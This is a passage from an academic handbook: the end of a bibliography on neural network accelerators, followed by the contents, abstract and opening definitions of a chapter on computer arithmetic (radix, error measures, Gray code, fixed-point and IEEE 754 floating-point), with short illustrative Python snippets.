Dally B (2021) Sustainable computing via domain-specific architecture and efficient circuits.
DATE Special Day on Sustainable HPC
Davies M, Srinivasa N, Lin TH, Chinya G, Cao Y, Choday SH, Dimou G, Joshi P, Imam N, Jain
S, Liao Y (2018) Loihi: a neuromorphic manycore processor with on-chip learning. IEEE Micro
38(1):82–99
Devlin J, Chang MW, Lee K, Toutanova K (2018) Bert: pre-training of deep bidirectional
transformers for language understanding. arXiv preprint arXiv:1810.04805
Ditzel D, Kuroda T, Lee S (2014) Low-cost 3D chip stacking with ThruChip wireless connections.
In: Proceedings of IEEE Hot Chips Symposium (HCS), pp 1–37
Dong C, Loy CC, Tang X (2016) Accelerating the super-resolution convolutional neural network.
In: European Conference on Computer Vision. Springer (2016), pp 391–407
Du Z, Fasthuber R, Chen T, Ienne P, Li L, Luo T, Feng X, Chen Y, Temam O (2015) ShiDianNao:
shifting vision processing closer to the sensor. In: Proceedings of the 42nd Annual International
Symposium on Computer Architecture, pp 92–104
Folowosele F, Harrison A, Cassidy A, Andreou AG, Etienne-Cummings R, Mihalas S, Niebur E,
Hamilton TJ (2009) A switched capacitor implementation of the generalized linear integrate-
and-fire neuron. In: 2009 IEEE International Symposium on Circuits and Systems (ISCAS).
IEEE, pp 2149–2152
Freericks M (1991) The nML machine description formalism. Leiter der Fachbibliothek Infor-
matik, Sekretariat FR 5–4
Frenkel C, Lefebvre M, Legat JD, Bol D (2018) A 0.086-mm 2 12.7-pj/sop 64k-synapse 256-neuron
online-learning digital spiking neuromorphic processor in 28-nm CMOS. IEEE Trans Biomed
Circuits Syst 13(1):145–158
Friedmann S, Schemmel J, Grübl A, Hartel A, Hock M, Meier K (2016) Demonstrating hybrid
learning in a flexible neuromorphic hardware system. IEEE Trans Biomed Circuits Syst
11(1):128–142
Furber SB, Galluppi F, Temple S, Plana LA (2014) The spinnaker project. Proc IEEE 102(5):652–
665
Gao M, Pu J, Yang X, Horowitz M, Kozyrakis C (2017) Tetris: scalable and efficient neural network
acceleration with 3d memory. In: Proceedings of the Twenty-Second International Conference
on Architectural Support for Programming Languages and Operating Systems, pp 751–764.
Gao C, Neil D, Ceolini E, Liu SC, Delbruck T (2018) DeltaRNN: a power-efficient recurrent neural
network accelerator. In: Proceedings of the 2018 ACM/SIGDA International Symposium on
Field-Programmable Gate Arrays, pp 21–30
Geng T, Li A, Shi R, Wu C, Wang T, Li Y, Haghi P, Tumeo A, Che S, Reinhardt S, Herbordt
MC (2020) AWB-GCN: a graph convolutional network accelerator with runtime workload
rebalancing. In: 2020 53rd Annual IEEE/ACM International Symposium on Microarchitecture
(MICRO). IEEE, pp 922–936
Ghosh-Dastidar S, Adeli H (2009) A new supervised learning algorithm for multiple spiking neural
networks with application in epilepsy and seizure detection. Neural Netw 22(10):1419–1431
Gokhale V, Jin J, Dundar A, Martini B, Culurciello E (2014) A 240 G-ops/s mobile coprocessor
for deep neural networks. In: CVPR Workshop, pp 682–687
Guo R, Liu Y, Zheng S, Wu SY, Ouyang P, Khwa WS, Chen X, Chen JJ, Li X, Liu L, Chang MF
(2019) A 5.1 pJ/neuron 127.3 us/inference RNN-based speech recognition processor using 16
computing-in-memory SRAM macros in 65 nm CMOS. In: 2019 Symposium on VLSI Circuits.
IEEE, pp C120–C121
Gwennap L (2016) Wave accelerates deep learning-new dataflow processor targets 10x speedup
for neural networks. The Linley MicroProcessor Report
Ham TJ, Jung SJ, Kim S, Oh YH, Park Y, Song Y, Park JH, Lee S, Park K, Lee JW, Jeong DK
(2020) A^3: accelerating attention mechanisms in neural networks with approximation. In: 2020
IEEE International Symposium on High Performance Computer Architecture (HPCA). IEEE,
pp 328–341
Han S, Liu X, Mao H, Pu J, Pedram A, Horowitz MA, Dally WJ (2016) EIE: efficient inference
engine on compressed deep neural network. ACM SIGARCH Comput Archit News 44(3):243–
254
Han S, Kang J, Mao H, Hu Y, Li X, Li Y, Xie D, Luo H, Yao S, Wang Y, Yang H (2017) Ese:
efficient speech recognition engine with sparse LSTM on FPGA. In: Proceedings of the 2017
ACM/SIGDA International Symposium on Field-Programmable Gate Arrays, pp 75–84
Hegde K, Agrawal R, Yao Y, Fletcher CW (2018) Morph: flexible acceleration for 3d cnn-
based video understanding. In: 2018 51st Annual IEEE/ACM International Symposium on
Microarchitecture (MICRO). IEEE, pp 933–946
Herculano-Houzel S (2009) The human brain in numbers: a linearly scaled-up primate brain. Front
Hum Neurosci 3:31
Hosomi M, Yamagishi H, Yamamoto T, Bessho K, Higo Y, Yamane K, Yamada H, Shoji M,
Hachino H, Fukumoto C, Nagao H (2005) A novel nonvolatile memory with spin torque transfer
magnetization switching: spin-RAM. In: IEEE International Electron Devices Meeting, 2005.
IEDM Technical Digest. IEEE, pp 459–462
Iandola FN, Han S, Moskewicz MW, Ashraf K, Dally WJ, Keutzer K (2016) SqueezeNet:
AlexNet-level accuracy with 50x fewer parameters and <0.5 MB model size. arXiv preprint
arXiv:1602.07360
Iandola FN, Shaw AE, Krishna R, Keutzer KW (2020) SqueezeBERT: what can computer vision
teach NLP about efficient neural networks? arXiv preprint arXiv:2006.11316
Indiveri G, Chicca E, Douglas RJ (2006) A VLSI array of low-power spiking neurons and bistable
synapses with spike–timing dependent plasticity. IEEE Trans Neural Netw 17(1):211–221
Izhikevich EM (2003) Simple model of spiking neurons. IEEE Trans Neural Netw 14(6):1569–
1572
James M et al (2020) Ispd 2020 physical mapping of neural networks on a wafer-scale deep
learning accelerator. In: Proceedings of the 2020 International Symposium on Physical Design
Jeddeloh J, Keeth B (2012) Hybrid memory cube new DRAM architecture increases density and
performance. In: 2012 Symposium on VLSI Technology (VLSIT). IEEE, pp 87–88
Jia T, Ju Y, Joseph R, Gu J (2020) NCPU: an embedded neural CPU architecture on resource-
constrained low power devices for real-time end-to-end performance. In: 2020 53rd Annual
IEEE/ACM International Symposium on Microarchitecture (MICRO). IEEE, pp 1097–1109
Joulin A, Cissé M, Grangier D, Jégou H (2017) Efficient softmax approximation for GPUs. In:
International Conference on Machine Learning. PMLR, pp 1302–1310
Jouppi NP, Young C, Patil N, Patterson D, Agrawal G, Bajwa R, Bates S, Bhatia S, Boden N,
Borchers A, Boyle R (2017) In-datacenter performance analysis of a tensor processing unit. In:
Proceedings of the 44th Annual International Symposium on Computer Architecture, pp 1–12
Jouppi NP, Yoon DH, Kurian G, Li S, Patil N, Laudon J, Young C, Patterson D (2020) A domain-
specific supercomputer for training deep neural networks. Commun ACM 63(7):67–78
Judd P, Albericio J, Hetherington T, Aamodt TM, Moshovos A (2016) Stripes: bit-serial deep
neural network computing. In: 2016 49th Annual IEEE/ACM International Symposium on
Microarchitecture (MICRO). IEEE, pp 1–12
Keutzer K (2021) What every NN accelerator architect should know about deep learning applications
and software. Keynote at 2021 IFIP/IEEE International Conference on Very Large Scale
Integration (VLSI-SoC)
Kim D, Kung J, Chai S, Yalamanchili S, Mukhopadhyay S (2016) Neurocube: a programmable
digital neuromorphic architecture with high-density 3D memory. ACM SIGARCH Comput
Archit News 44(3):380–392
Kim H, Sim J, Choi Y, Kim LS (2019) Nand-net: minimizing computational complexity of in-
memory processing for binary neural networks. In: 2019 IEEE International Symposium on
High Performance Computer Architecture (HPCA). IEEE, pp 661–673
Kim S, Gholami A, Yao Z, Mahoney MW, Keutzer K (2021a) I-bert: integer-only bert quantization.
In: International Conference on Machine Learning. PMLR, pp 5506–5518
Kim S, Gholami A, Yao Z, Nrusimha A, Zhai B, Gao T, Mahoney MW, Keutzer K (2021b) Q-
ASR: Integer-Only Zero-Shot Quantization for Efficient Speech Recognition. arXiv e-prints,
arXiv-2103
Ko GG, Chai Y, Donato M, Whatmough PN, Tambe T, Rutenbar RA, Brooks D, Wei GY (2020)
A 3mm 2 programmable Bayesian inference accelerator for unsupervised machine perception
using parallel Gibbs sampling in 16nm. In: 2020 IEEE Symposium on VLSI Circuits. IEEE,
pp 1–2
Korat UA, Alimohammad A (2019) A reconfigurable hardware architecture for principal compo-
nent analysis. Circuits Syst Sig Process 38(5):2097–2113
Krizhevsky A, Sutskever I, Hinton GE (2012) Imagenet classification with deep convolutional
neural networks. Adv Neural Inf Process Syst 25:1097–1105
Kwon H, Samajdar A, Krishna T (2018) Maeri: enabling flexible dataflow mapping over DNN
accelerators via reconfigurable interconnects. ACM SIGPLAN Not 53(2):461–475
Lee DU, Kim KW, Kim KW, Kim H, Kim JY, Park YJ, Kim JH, Kim DS, Park HB, Shin JW,
Cho JH (2014) 25.2 A 1.2 V 8Gb 8-channel 128GB/s high-bandwidth memory (HBM) stacked
DRAM with effective microbump I/O test methods using 29nm process and TSV. In: 2014
IEEE International Solid-State Circuits Conference Digest of Technical Papers (ISSCC). IEEE,
pp 432–433
Lee J, Kim C, Kang S, Shin D, Kim S, Yoo H (2018) UNPU: a 50.6TOPS/W unified deep
neural network accelerator with 1b-to-16b fully-variable weight bit-precision. In: 2018 IEEE
International Solid – State Circuits Conference (ISSCC), pp 218–220
Lee J, Shin D, Lee J, Lee J, Kang S, Yoo HJ (2019) A full HD 60 fps CNN super resolution
processor with selective caching based layer fusion for mobile devices. In: 2019 Symposium on
VLSI Circuits. IEEE, pp C302–C303
Li Z, Ding C, Wang S, Wen W, Zhuo Y, Liu C, Qiu Q, Xu W, Lin X, Qian X, Wang Y (2019a)
E-RNN: Design optimization for efficient recurrent neural networks in FPGAs. In: 2019 IEEE
International Symposium on High Performance Computer Architecture (HPCA). IEEE, pp 69–
80
Li Y, Liu IJ, Yuan Y, Chen D, Schwing A, Huang J (2019b) Accelerating distributed reinforcement
learning with in-switch computing. In: 2019 ACM/IEEE 46th Annual International Symposium
on Computer Architecture (ISCA). IEEE, pp 279–291
Li J, Louri A, Karanth A, Bunescu R (2021) GCNAX: a flexible and energy-efficient accelerator
for graph convolutional neural networks. In: 2021 IEEE International Symposium on High-
Performance Computer Architecture (HPCA). IEEE, pp 775–788
Lines A, Joshi P, Liu R, McCoy S, Tse J, Weng YH, Davies M (2018) Loihi asynchronous
neuromorphic research chip. In: 2018 24th IEEE International Symposium on Asynchronous
Circuits and Systems (ASYNC). IEEE, pp 32–33
Liu D, Chen T, Liu S, Zhou J, Zhou S, Teman O, Feng X, Zhou X, Chen Y (2015) Pudiannao: a
polyvalent machine learning accelerator. ACM SIGARCH Comput Archit News 43(1):369–381
Liu S, Du Z, Tao J, Han D, Luo T, Xie Y, Chen Y, Chen T (2016) Cambricon: an instruction set
architecture for neural networks. In: 2016 ACM/IEEE 43rd Annual International Symposium
on Computer Architecture (ISCA). IEEE, pp 393–405
Liu C, Bellec G, Vogginger B, Kappel D, Partzsch J, Neumärker F, Höppner S, Maass W,
Furber SB, Legenstein R, Mayr CG (2018) Memory-efficient deep learning on a spinnaker 2
prototype. Front Neurosci 12:840
Lu W, Yan G, Li J, Gong S, Han Y, Li X (2017) Flexflow: a flexible dataflow accelerator
architecture for convolutional neural networks. In: 2017 IEEE International Symposium on High
Performance Computer Architecture (HPCA). IEEE, pp 553–564
Maher MAC, Deweerth SP, Mahowald MA, Mead CA (1989) Implementing neural architectures
using analog VLSI circuits. IEEE Trans Circuits Syst 36(5):643–652
Mahmoud M, Siu K, Moshovos A (2018) Diffy: a Déjà vu-free differential deep neural network
accelerator. In: 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture
(MICRO). IEEE, pp 134–147
Martin AJ (1990) The limitations to delay-insensitivity in asynchronous circuits. In: Beauty is our
business. Springer, New York, pp 302–311
Martin AJ, Nyström M (2004) CAST: Caltech asynchronous synthesis tools. In: Asynchronous
Circuit Design Working Group Workshop, Turku
Mead C (1990) Neuromorphic electronic systems. Proc IEEE 78(10):1629–1636
Meng H, Appiah K, Hunter A, Dickinson P (2011) FPGA implementation of naive bayes classifier
for visual object recognition. In: CVPR 2011 WORKSHOPS. IEEE, pp 123–128
Mitchell TM (1997) Machine learning. McGraw Hill. ISBN 0-07-042807-7
Molchanov P, Hall J, Yin H, Kautz J, Fusi N, Vahdat A (2021) HANT: hardware-aware network
transformation. arXiv preprint arXiv:2107.10624
Moons B, Uytterhoeven R, Dehaene W, Verhelst M (2017) 14.5 envision: a 0.26-to-10tops/w
subword-parallel dynamic-voltage-accuracy-frequency-scalable convolutional neural network
processor in 28 nm FDSOI. In: 2017 IEEE International Solid-State Circuits Conference
(ISSCC). IEEE, pp 246–247
Moreau T, Chen T, Vega L, Roesch J, Yan E, Zheng L, Fromm J, Jiang Z, Ceze L, Guestrin C
(2019) A hardware–software blueprint for flexible deep learning specialization. IEEE Micro
39(5):8–16
Norrie T, Patil N, Yoon DH, Kurian G, Li S, Laudon J, Young C, Jouppi NP, Patterson DA (2020)
Google’s Training Chips Revealed: TPUv2 and TPUv3. In: Hot Chips Symposium, pp 1–70
NVIDIA (2017) NVIDIA deep learning accelerator (NVDLA). http://nvdla.org
Papadonikolakis M, Bouganis CS (2012) Novel cascade FPGA accelerator for support vector
machines classification. IEEE Trans Neural Netw Learn Syst 23(7):1040–1052
Peemen M, Setio AAA, Mesman B, Corporaal H (2013) Memory-centric accelerator design for
convolutional neural networks. In: IEEE International Conference on Computer Design (ICCD),
pp 13–19
Pei J, Deng L, Song S, Zhao M, Zhang Y, Wu S, Wang G, Zou Z, Wu Z, He W, Chen F
(2019) Towards artificial general intelligence with hybrid Tianjic chip architecture. Nature
572(7767):106–111
Reagen B, Whatmough P, Adolf R, Rama S, Lee H, Lee SK, Hernández-Lobato JM, Wei GY,
Brooks D (2016) Minerva: enabling low-power, highly-accurate deep neural network acceler-
ators. In: 2016 ACM/IEEE 43rd Annual International Symposium on Computer Architecture
(ISCA). IEEE, pp 267–278
Riera M, Arnau JM, González A (2018) Computation reuse in DNNs by exploiting input similarity.
In: 2018 ACM/IEEE 45th Annual International Symposium on Computer Architecture (ISCA).
IEEE, pp 57–68
Ryu S, Kim H, Yi W, Kim JJ (2019) Bitblade: area and energy-efficient precision-scalable neural
network accelerator with bitwise summation. In: Proceedings of the 56th Annual Design
Automation Conference 2019, pp 1–6
Sandler M, Howard A, Zhu M, Zhmoginov A, Chen LC (2018) Mobilenetv2: inverted residuals
and linear bottlenecks. In: Proceedings of the IEEE Conference on Computer Vision and Pattern
Recognition, pp 4510–4520
Sanh V, Debut L, Chaumond J, Wolf T (2019) DistilBERT, a distilled version of BERT: smaller,
faster, cheaper and lighter. arXiv preprint arXiv:1910.01108
Sanh V, Wolf T, Rush A (2020) Movement pruning: adaptive sparsity by fine-tuning. Adv Neural
Inf Process Syst 33:20378–20389
Saqib F, Dutta A, Plusquellic J, Ortiz P, Pattichis MS (2013) Pipelined decision tree classification
accelerator implementation in FPGA (DT-CAIF). IEEE Trans Comput 64(1):280–285
Schemmel J, Brüderle D, Grübl A, Hock M, Meier K, Millner S (2010) A wafer-scale neuromorphic hardware
system for large-scale neural modeling. In: 2010 IEEE International Symposium on Circuits and
Systems (ISCAS). IEEE, pp 1947–1950
Schuman CD, Potok TE, Patton RM, Birdwell JD, Dean ME, Rose GS, Plank JS (2017) A survey
of neuromorphic computing and neural networks in hardware. arXiv preprint arXiv:1705.06963
Sharma H, Park J, Suda N, Lai L, Chau B, Chandra V, Esmaeilzadeh H (2018) Bit fusion: bit-
level dynamically composable architecture for accelerating deep neural network. In: 2018
ACM/IEEE 45th Annual International Symposium on Computer Architecture (ISCA). IEEE,
pp 764–775
Shen J, Huang Y, Wang Z, Qiao Y, Wen M, Zhang C (2018) Towards a uniform template-
based architecture for accelerating 2D and 3D CNNs on FPGA. In: Proceedings of the 2018
ACM/SIGDA International Symposium on Field-Programmable Gate Arrays, pp 97–106
Sun Z, Yu H, Song X, Liu R, Yang Y, Zhou D (2019) Mobilebert: task-agnostic compression of
bert by progressive knowledge transfer
Sun Z, Yu H, Song X, Liu R, Yang Y, Zhou D (2020) Mobilebert: a compact task-agnostic bert for
resource-limited devices. arXiv preprint arXiv:2004.02984
Sze V, Chen YH, Yang TJ, Emer JS (2017) Efficient processing of deep neural networks: a tutorial
and survey. Proc IEEE 105(12):2295–2329
Tambe T, Yang EY, Ko GG, Chai Y, Hooper C, Donato M, Whatmough PN, Rush AM, Brooks
D, Wei GY (2021) 9.8 A 25 mm 2 SoC for IoT devices with 18 ms noise-robust speech-to-text
latency via Bayesian speech denoising and attention-based sequence-to-sequence DNN speech
recognition in 16 nm FinFET. In: 2021 IEEE International Solid-State Circuits Conference
(ISSCC), vol 64. IEEE, pp 158–160
Tay Y, Dehghani M, Abnar S, Shen Y, Bahri D, Pham P, Rao J, Yang L, Ruder S, Metzler D (2020)
Long range arena: a benchmark for efficient transformers. arXiv preprint arXiv:2011.04006
Temam O (2012) A defect-tolerant accelerator for emerging high-performance applications. In:
2012 39th Annual International Symposium on Computer Architecture (ISCA). IEEE, pp 356–
367
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 382
Definitions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385
Radix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385
Positional Notation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 386
Absolute Error . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 386
Relative Error . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 386
Numerical Precision . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387
Units in the Last Place . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387
Machine Epsilon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387
Floating-Point Operations Per Second . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387
Integer Arithmetic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387
Gray Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 388
Unary Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389
Fixed-Point Arithmetic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389
Floating-Point Arithmetic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 390
IEEE 754 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 390
Floating-Point Approximate Circuits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 393
Posit Arithmetic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 394
Other Formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 395
Hardware Implementations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 396
Adders . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 396
Multipliers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 397
Dividers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
Square Root . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399
F. Merchant ()
University of Groningen, Groningen, The Netherlands
e-mail: [email protected]
Abstract
Computer arithmetic has been an active area of research since the advent of
computers. The number system study diverged to fit the underlying computer
architecture and applications. The acceleration of arithmetic circuits has been
a challenging task due to the complexities involved in hardware designs.
The advances in technologies, backed by innovations, led to the performance
improvements in the sequential arithmetic circuits until the breakdown of
Moore’s law. There was significant progress in the meantime in the domain
of number representations to fit maximum information per bit. In the late
1990s and early 2000s, the inventions in energy and area efficient arithmetic
circuits flourished with growing application requirements. The three formats,
integer, fixed-point, and floating-point, became prominent based on application
requirements, and several approximation techniques were exercised within and
across the representations. Post-2010, approximate computing rose to prominence
as several applications could tolerate “just enough” precision and numerical
accuracy in the arithmetic. While approximate computing undermines the
reproducibility aspects of the arithmetic, it renders high performance gains.
This chapter presents an overall view of the current state and future directions
for computer arithmetic and arithmetic architectures.
Introduction
The quest for arithmetic research began with mechanical computers, well before
the advent of digital computers. Early scientists developed mechanical calculators
to perform basic arithmetic operations; Napier’s bones, the abacus, and Pascal’s
calculator are examples. Meanwhile, the binary number system was extensively
studied in Europe by Thomas Harriot, Juan Caramuel y Lobkowitz, and Gottfried
Leibniz. However, the binary number system has its roots in multiple cultures
such as Egypt, China, and India. Around the mid-twentieth century, with the arrival
of the von Neumann model, arithmetic hardware research gained momentum. A tentative
timeline of the developments is shown in Fig. 1.
Until 1970, computers used a “multiplier routine” to compute multiplications.
The multiplier routine shifts and accumulates the partial products. Among the first
processors to provide a hardware multiplication instruction were the Motorola 6809
and the Intel MCS-51 family. Later, Intel launched the 8087, a floating-point coprocessor
compliant with x87 (also known as Numeric Processor eXtension – NPX) (Palmer
1980). The 8087 coprocessor, contained in a 40-pin DIP packaged chip, was
• High-level details of different arithmetic formats in play, ranging from integer
to some of the most recent ones
• Qualitative and quantitative comparison of the different arithmetic formats
Fig. 3 Die of the 8087 coprocessor chip highlighting the main components of the design (a) and
part of the constant ROM (b). (Figure source Ken Shirriff’s Blog 2021)
Definitions
Before delving into the arithmetic formats and their hardware implementation
details, it is advisable to understand a few definitions used in computer arithmetic,
including the terminology associated with arithmetic efficiency in hardware.
Radix
Radix is defined as the base of the number system. The most prevalent radices are
binary (radix 2) and decimal (radix 10). Binary numbers are natural for machines,
but human understanding of binary numbers is limited: as numbers get bigger, the
ability of humans to decode them or perform any arithmetic on them diminishes.
The decimal numbers
are, on the other hand, easy for humans to understand. It is possible to build
computers with a radix other than 2, especially with technologies that can support
switching at multiple voltage levels. The discussion of multivalued logic and
digital circuit design for multivalued logic is beyond the scope of this exposition.
Positional Notation
Positional notation refers to the number representation system where each digit’s
position has a place value. The number is the sum of the products of each digit by
its place value. A generic string is given by

. . . d3 b3 + d2 b2 + d1 b1 + d0 b0 + d−1 b−1 + d−2 b−2 . . . (1)
In positional notation, the radix b is the base of the number system, and each digit d
ranges from 0 to b − 1. To separate the digits with positive (inclusive of 0) and
negative exponents, a radix point is used. The radix point concept is heavily
emphasized in non-integer number representations, especially in number systems
containing fractional parts.
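As a concrete illustration of Eq. 1, the following Python sketch (a minimal example with a hypothetical helper name) evaluates a digit string in an arbitrary radix; digits to the right of the radix point simply carry negative exponents:

```python
def positional_value(digits, radix, frac_digits=0):
    """Evaluate digits d_n ... d_0 . d_-1 ... in the given radix.

    `frac_digits` counts the trailing entries that lie to the right of
    the radix point, i.e., the digits with negative exponents.
    """
    value = 0.0
    exponent = len(digits) - frac_digits - 1  # exponent of the leading digit
    for d in digits:
        assert 0 <= d < radix, "each digit must lie in 0..radix-1"
        value += d * radix ** exponent
        exponent -= 1
    return value

# The binary string 010.010 has integer part 010 and fractional part 010
print(positional_value([0, 1, 0, 0, 1, 0], radix=2, frac_digits=3))  # 2.25
```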
Absolute Error
Relative Error
Relative error is more reliable while comparing error in the measurements even at
a different scale. The relative error is obtained by normalizing the absolute error by
the correct value and is given by
relative error = absolute error / |correct value| (2)
For the example of variables x and y in section “Absolute Error,” the relative
errors in the computation of the two variables will be 0.1 and 0.01, respectively. A
relative error has two features that should be considered in practice: (i) relative error
is undefined if the correct value is zero, and (ii) relative error makes sense only if
the scale used has a true meaningful zero.
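As a small worked sketch (the helper names are illustrative), Eq. 2 and its zero-denominator caveat translate directly into Python:

```python
def absolute_error(measured: float, correct: float) -> float:
    return abs(measured - correct)

def relative_error(measured: float, correct: float) -> float:
    if correct == 0:
        raise ZeroDivisionError("relative error is undefined when the correct value is zero")
    return absolute_error(measured, correct) / abs(correct)

print(relative_error(9.9, 10.0))   # ~0.01: a 1% error
print(relative_error(0.99, 1.0))   # ~0.01: the same relative error at a different scale
```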
Numerical Precision
Units in the Last Place

Unit in the last place (ULP) is defined as the distance between two consecutive
representable numbers in a computer system. ULP is used as a metric to identify the
trustworthiness of the computer system (Goldberg 1991).
Machine Epsilon
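Machine epsilon is commonly defined as the difference between 1.0 and the next larger representable floating-point number. As a minimal, self-contained sketch, the following Python code reports the ULP at 1.0 and derives the machine epsilon of IEEE 754 double precision by halving (math.ulp requires Python 3.9 or later):

```python
import math
import sys

# Distance from 1.0 to the next representable double
print(math.ulp(1.0))            # 2.220446049250313e-16

# Machine epsilon by direct search: the smallest power of two eps
# for which 1.0 + eps is still distinguishable from 1.0
eps = 1.0
while 1.0 + eps / 2 != 1.0:
    eps /= 2
print(eps)                      # 2.220446049250313e-16 (= 2**-52)
print(sys.float_info.epsilon)   # the same value, as reported by the runtime
```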
Integer Arithmetic
Unsigned integers can be captured in Eq. 1 by leaving out the digits with a negative
exponent. In that case, the digits of an integer can be given by
. . . d3 b3 + d2 b2 + d1 b1 + d0 b0 (3)
Gray Code
Gray code is also known as reflected binary code (RBC). In Gray code, two
successive numbers differ in only 1 bit. A 3-bit example of Gray code is: 000, 001,
011, 010, 110, 111, 101, 100.
Gray codes were designed to overcome a physical limitation of the binary number
system. In the binary number system, two consecutive numbers can differ in more
than 1 bit, leading to synchronization issues while switching. For an N-bit binary
number, up to N bits may change between consecutive values, while in Gray code
there is always a 1-bit difference.
Due to non-simple arithmetic circuits, Gray codes have limited application.
Some of the prominent applications of Gray codes are position encoders, genetic
algorithms, error correction, Boolean circuit minimization, and arithmetic counters.
Gray codes have also found application in low-power computer architecture bus
design due to their switching characteristics.
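The reflected binary encoding and its inverse are one-liners in hardware and software alike; the following Python sketch converts in both directions and reproduces the 3-bit sequence above:

```python
def binary_to_gray(n: int) -> int:
    """Reflected binary Gray code: adjacent integers differ in exactly one bit."""
    return n ^ (n >> 1)

def gray_to_binary(g: int) -> int:
    """Invert the encoding by folding successively shifted copies back in."""
    n = g
    while g > 0:
        g >>= 1
        n ^= g
    return n

for i in range(8):
    assert gray_to_binary(binary_to_gray(i)) == i       # round trip
    print(f"{i:03b} -> {binary_to_gray(i):03b}")        # 000, 001, 011, 010, ...
```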
Unary Code
In unary code, a nonnegative integer n is typically represented by a run of n ones
terminated by a zero. Alternatively, ones can be replaced by zeros and vice versa
without loss of generality. Unary coding has a significant disadvantage in that it is
not amenable to basic arithmetic operations, and hence the adoption of unary coding
in mainstream computing is undesired.
Fixed-Point Arithmetic
Fixed-point number format, as the name suggests, has a predefined position for
the radix point. Fixed-point numbers are useful in representing fractional values
and have a higher resolution as compared to integer numbers. Fixed-point numbers
follow an integer.fraction format and are given by Eq. 1. The total number of digits in
a fixed-point number is #integer_digits + #fraction_digits + 1. An example of a
fixed-point number is 010.010, which represents 2.25 in decimal (Fig. 4).
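A common software realization of fixed-point numbers stores the scaled value as a plain integer (often called Q-format; the helper names below are illustrative). Addition then needs no extra work, while multiplication needs one rescaling shift:

```python
FRAC_BITS = 3  # three fractional bits, as in the 010.010 example above

def to_fixed(x: float) -> int:
    """Quantize a real number to a fixed-point integer (round to nearest)."""
    return round(x * (1 << FRAC_BITS))

def from_fixed(f: int) -> float:
    """Recover the real value by rescaling."""
    return f / (1 << FRAC_BITS)

a, b = to_fixed(2.25), to_fixed(1.5)      # 010.010 and 001.100 in binary
print(from_fixed(a + b))                  # 3.75: addition is plain integer addition
print(from_fixed((a * b) >> FRAC_BITS))   # 3.375: a product carries 2x FRAC_BITS, so shift once
```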
Floating-Point Arithmetic
Out of all the arithmetic formats, the floating-point formats are the most challenging
for hardware optimizations. A floating-point number is given by significand ×
base^exponent. The term “floating-point” refers to the fact that the radix-point position
is not fixed in the representation and depends on the value of the exponent. There
have been a variety of proposals in the literature for the implementations of the
floating-point formats. The most prominent is IEEE 754 format shown in Fig. 5 that
captures scale factor in the exponent field. All the formats are briefly covered in this
exposition.
IEEE 754
An IEEE 754 compliant number has three fields: sign, exponent, and fraction (see
Fig. 5). A bias is added to the exponent to represent very small and very large
quantities. The value of the bias depends on the size of the format.
The IEEE 754 standard defines five basic formats as well as interchange formats.
Table 1 summarizes the formats covered in the IEEE 754 standard. The decimal digits
are calculated by (#significand_digits × log10 base).
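The three fields of a binary32 number can be inspected directly by reinterpreting its bits; the following Python sketch (using only the standard struct module) extracts sign, biased exponent, and fraction:

```python
import struct

def decode_binary32(x: float):
    """Split an IEEE 754 single-precision number into its three fields."""
    (bits,) = struct.unpack(">I", struct.pack(">f", x))
    sign = bits >> 31
    exponent = (bits >> 23) & 0xFF    # biased by 127 for binary32
    fraction = bits & 0x7FFFFF        # 23 explicit significand bits
    return sign, exponent, fraction

sign, exp, frac = decode_binary32(-6.25)
# -6.25 = -1.5625 * 2^2, so the unbiased exponent is 2
print(sign, exp - 127, hex(frac))     # 1 2 0x480000
```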
